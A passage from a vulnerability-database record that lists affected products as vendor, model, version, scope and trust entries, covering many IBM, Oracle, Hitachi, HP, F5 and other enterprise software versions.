"knowledge", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.6.0", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: 
"rational reporting for development intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.0.2", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0.0.13", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1", }, { model: "tiered storage manager software (linux(suse", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "tivoli endpoint manager for remote control", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "content analytics with enterprise search", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.2", }, { model: "business process manager advanced", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.0", }, { model: "xp p9000 tiered storage manager", scope: "eq", trust: 0.3, vendor: "hp", version: "1.1.0-00", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1.0.47", }, { model: "websphere portal", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "4.5", }, { model: "tivoli dynamic workload console", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.6.0.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "linux sparc", scope: "eq", trust: 0.3, vendor: "debian", version: "6.0", }, { model: "linux enterprise software development kit sp3", scope: "eq", trust: 0.3, vendor: "suse", version: "11", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "big-ip edge gateway hf5", 
scope: "eq", trust: 0.3, vendor: "f5", version: "11.2.1", }, { model: "rational insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.1.1", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.1", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0", }, { model: "secure analytics 2013.2r8", scope: "ne", trust: 0.3, vendor: "juniper", version: null, }, { model: "tivoli endpoint manager for remote control", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.2", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1", }, { model: "job management partner 1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-0", }, { model: "device manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.0-00", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.41", }, { model: "content manager records enabler", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "device manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.0-06", }, { model: "tivoli integrated portal", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.1.1.19", }, { model: "openpages grc platform", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2.1", }, { model: "content navigator", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0.1", }, { model: "device manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.3-00", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "tuning manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "websphere portal", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0", }, { model: "openpages", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { 
model: "big-ip edge gateway", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2", }, { model: "business process manager standard", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.x", }, { model: "device manager software (solaris", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1.1-04(x64))", }, { model: "business server", scope: "eq", trust: 0.3, vendor: "mandriva", version: "1", }, { model: "tivoli endpoint manager for remote control", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.2.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1.0.43", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-05", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.10", }, { model: "jboss operations network", scope: "eq", trust: 0.3, vendor: "redhat", version: "3.2.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "device manager", scope: "eq", trust: 0.3, vendor: "hp", version: "1.0.0-00", }, { model: "content navigator", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "xp7 global link manager software", scope: "eq", trust: 0.3, vendor: "hp", version: "6.4.0-00", }, { model: "raplication manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-05", }, { model: "xp p9000 tiered storage manager", scope: "eq", trust: 0.3, vendor: "hp", version: "8.0.0-00", }, { model: "websphere partner gateway advanced edition", scope: "eq", trust: 0.3, vendor: "ibm", version: 
"6.2", }, { model: "weblogic portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.42", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.0", }, { model: "global link manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.5-00", }, { model: "tiered storage manager software", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.5.0-02", }, { model: "big-ip webaccelerator hf1", scope: "eq", trust: 0.3, vendor: "f5", version: "10.2.1", }, { model: "sitescope", scope: "eq", trust: 0.3, vendor: "hp", version: "11.20", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "xp p9000 tiered storage manager", scope: "eq", trust: 0.3, vendor: "hp", version: "8.0.0-06", }, { model: "big-ip webaccelerator", scope: "eq", trust: 0.3, vendor: "f5", version: "10.0", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.0.0-00", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.2-01", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-10-07", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0.0.27", }, { model: "tiered storage manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.0.0-00", }, { model: "device manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-05", }, { model: "knowledge", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1.7", }, { model: "websphere lombardi 
edition", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.1.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "lotus expeditor", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2.2", }, { model: "device manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "device manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-07", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5", }, { model: "tivoli provisioning manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1", }, { model: "arx", scope: "eq", trust: 0.3, vendor: "f5", version: "6.0", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "4.2.1", }, { model: "tuning manager software (linux(suse", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "websphere sensor events", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "openpages", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.0.1.5", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.0", }, { model: "security threat response manager", scope: "eq", trust: 0.3, vendor: "juniper", version: "2012.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "xp p9000 replication manager", scope: "eq", trust: 0.3, vendor: "hp", version: "6.0.0-00", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0.10", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.2.1-00", }, { model: "qradar siem mr2", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.1", }, { model: "arx", scope: "eq", trust: 0.3, vendor: "f5", version: "6.4", }, { model: "tivoli dynamic workload console", scope: "eq", trust: 0.3, vendor: "ibm", 
version: "8.5", }, { model: "big-ip edge gateway", scope: "eq", trust: 0.3, vendor: "f5", version: "11.1", }, { model: "websphere service registry and repository", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0", }, { model: "tivoli workload scheduler distributed", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.1", }, { model: "filenet p8 platform content search engine", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1", }, { model: "tivoli identity manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.0", }, { model: "tivoli netcool/omnibus web gui", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.4", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1.0.35", }, { model: "tuning manager software (solaris(x6", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "tivoli composite application manager for websphere", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1", }, { model: "tiered storage manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-08", }, { model: "ds8870", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.3", }, { model: "raplication manager software (linux(suse", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "tuning manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.001", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "qradar siem mr5", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "communications webrtc session controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "arx", scope: "eq", trust: 0.3, vendor: "f5", version: "6.3", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.07", }, { model: "infosphere identity insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0", }, { 
model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.0.3", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.3", }, { model: "retail allocation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0", }, { model: "infosphere master data management collaborative edition", scope: "eq", trust: 0.3, vendor: "ibm", version: "-10.0", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.1-00", }, { model: "qradar siem mr2", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.2", }, { model: "device manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-08", }, { model: "device manager software", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { model: "business process manager express", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "endpoint manager for remote control", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1.0.39", }, { model: "vcenter server", scope: "eq", trust: 0.3, vendor: "vmware", version: "5.0", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.0-00", }, { model: "predictive insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "big-ip edge gateway", scope: "eq", trust: 0.3, vendor: "f5", version: "10.2.4", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0.0.23", }, { model: "social media analytics", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.2", }, { model: "device manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-07", }, { model: "tivoli integrated portal", scope: "eq", trust: 0.3, vendor: "ibm", version: 
"2.2", }, { model: "arx", scope: "eq", trust: 0.3, vendor: "f5", version: "6.2", }, { model: "tivoli workload scheduler distributed", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.4", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "global link manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-01", }, { model: "retail allocation", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0.0.15", }, { model: "device manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1.1-03", }, { model: "tivoli workload scheduler z/os connector", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.1", }, { model: "application manager for smart business", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.2.1", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0.0.31", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.3.5.0", }, { model: "lotus expeditor", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2.3", }, { model: "big-ip aam", scope: "eq", trust: 0.3, vendor: "f5", version: "11.5.1", }, { model: "device manager software (linux(rhel", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-09-00-08", }, { model: "linux ia-64", scope: "eq", trust: 0.3, vendor: "debian", version: "6.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-11-01", }, { model: "business process manager standard", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.0", }, { model: "big-ip edge gateway", scope: "eq", trust: 
0.3, vendor: "f5", version: "11.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "device manager software (solaris", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1.1-03(x64))", }, { model: "retail back office 12.0.9in", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "device manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.0-00", }, { model: "tivoli netcool configuration manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.4", }, { model: "real-time decision platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0", }, { model: "filenet content manager content engine", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.2.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.2", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-09-10", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-09-00-07", }, { model: "tiered storage manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.0-00", }, { model: "network satellite server (for rhel", scope: "eq", trust: 0.3, vendor: "redhat", version: "6)5.5", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1.0.31", }, { model: "filenet p8 platform content search engine", scope: "eq", trust: 0.3, vendor: "ibm", version: "4.5.1", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.05", }, { model: "infosphere master data management collaborative edition", scope: "eq", trust: 0.3, vendor: "ibm", version: "-11.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.55", }, { model: "tivoli netcool configuration manager", scope: "eq", trust: 0.3, vendor: 
"ibm", version: "6.3", }, { model: "security qradar", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.2.2", }, { model: "tivoli foundations for application manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.2", }, { model: "infosphere master data management server for product information", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "infosphere information server", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.5.0.0", }, { model: "identity manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.5", }, { model: "waveset", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "tivoli identity manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1", }, { model: "big-ip edge gateway hf3", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2", }, { model: "big-ip aam", scope: "eq", trust: 0.3, vendor: "f5", version: "11.4.0", }, { model: "network satellite server (for rhel", scope: "eq", trust: 0.3, vendor: "redhat", version: "6)5.4", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-11", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "tiered storage manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "tivoli netcool configuration manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-00-11", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1.1.4", }, { model: "tuning manager software", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { 
model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.402", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.2.1-00", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.2.1-01", }, { model: "big-ip aam", scope: "eq", trust: 0.3, vendor: "f5", version: "11.4.1", }, { model: "tiered storage manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.1-02", }, { model: "big-ip webaccelerator", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2.00", }, { model: "secure analytics 2012.1r7", scope: "ne", trust: 0.3, vendor: "juniper", version: null, }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-03", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1-00", }, { model: "device manager software (solaris(op", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.4.0-00", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1.1.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.0", }, { model: "insurance ifrs analyzer", scope: "eq", trust: 0.3, vendor: "oracle", version: "178.0.7", }, { model: "smart analytics system", scope: "eq", trust: 0.3, vendor: "ibm", version: "56001", }, { model: "financial transaction manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.1", }, { model: "tivoli storage manager administration center", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2", }, { model: "rational insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.0.11", }, { model: "retail markdown optimization", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "secure analytics", scope: "eq", trust: 0.3, vendor: 
"juniper", version: "2013.2", }, { model: "big-ip edge gateway", scope: "eq", trust: 0.3, vendor: "f5", version: "10.2.1", }, { model: "websphere lombardi edition", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.2", }, { model: "distributed marketing", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.2", }, { model: "infosphere balanced warehouse c4000", scope: null, trust: 0.3, vendor: "ibm", version: null, }, { model: "device manager software (solaris", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1-00(x64))", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1.0.33", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.03", }, { model: "sitescope", scope: "eq", trust: 0.3, vendor: "hp", version: "11.24", }, { model: "rational reporting for development intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0.5", }, { model: "websphere partner gateway express edition", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.0.0.3", }, { model: "tiered storage manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.1-02", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail markdown optimization", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "terasoluna server framework for java", scope: "eq", trust: 0.3, vendor: "ntt data", version: "2.0.51", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.3", }, { model: "distributed marketing", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1", }, { model: "tiered storage manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-08", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: 
"4.2.2.177", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1.0.45", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.01", }, { model: "big-ip webaccelerator", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2.1", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0.0.0", }, { model: "tuning manager software (linux(suse", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "communications metasolv solution", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.10.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "filenet p8 platform content search engine", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.0", }, { model: "raplication manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "linux amd64", scope: "eq", trust: 0.3, vendor: "debian", version: "6.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "big-ip edge gateway hf2", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2.1", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.06", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "liferay", version: "6.2.1", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.02", }, { model: "big-ip edge gateway", scope: "eq", trust: 0.3, vendor: "f5", version: "10.1", }, { model: "business process manager 
standard", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.0", }, { model: "xp7 global link manager software", scope: "eq", trust: 0.3, vendor: "hp", version: "7.6.0-02", }, { model: "secure analytics 2014.2r2", scope: "ne", trust: 0.3, vendor: "juniper", version: null, }, { model: "rational reporting for development intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.01", }, { model: "big-ip webaccelerator hf5", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.09", }, { model: "rational reporting for development intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.0.21", }, { model: "raplication manager software (linux(suse", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { model: "tivoli integrated portal", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.1.115", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "tivoli application dependency discovery manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.2.2", }, { model: "linux mips", scope: "eq", trust: 0.3, vendor: "debian", version: "6.0", }, { model: "tiered storage manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.0-00", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0.0.19", }, { model: "portal 6.2.1-ce-ga2-securit", scope: null, trust: 0.3, vendor: "liferay", version: null, }, { model: "tivoli dynamic workload console", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.1", }, { model: "tiered storage manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.3.0-00", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2", }, { model: "big-ip edge gateway hf1", scope: "eq", trust: 0.3, 
vendor: "f5", version: "10.2.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.21.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "struts", scope: "ne", trust: 0.3, vendor: "apache", version: "2.3.16.2", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0.0.25", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "leads", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1", }, { model: "device manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.0-00", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "infosphere balanced warehouse d5100", scope: null, trust: 0.3, vendor: "ibm", version: null, }, { model: "tiered storage manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "security threat response manager 2013.2r8", scope: "ne", trust: 0.3, vendor: "juniper", version: null, }, { model: "tivoli system automation application manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.2", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.3", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.08", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "tuning manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.401", }, { model: "big-ip webaccelerator hf3", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2.1", }, { model: "business process manager advanced", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.0", }, { model: "tivoli storage productivity center", 
scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1.1.0", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.0-00", }, { model: "business process manager express", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.0", }, { model: "device manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0-00", }, { model: "device manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "global link manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.3", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "distributed marketing", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.6", }, { model: "knowledge", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.6.1", }, { model: "tiered storage manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.0-00", }, { model: "sitescope", scope: "eq", trust: 0.3, vendor: "hp", version: "11.2", }, { model: "enterprise server x86 64", scope: "eq", trust: 0.3, vendor: "mandrakesoft", version: "5", }, { model: "raplication manager software (solaris(x6", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.0.1.0", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0", }, { model: "tivoli storage manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.3.0", }, { model: "security siteprotector system", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.0", }, { model: "infosphere mashuphub", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0", }, { model: "global link manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.2-01", }, { model: 
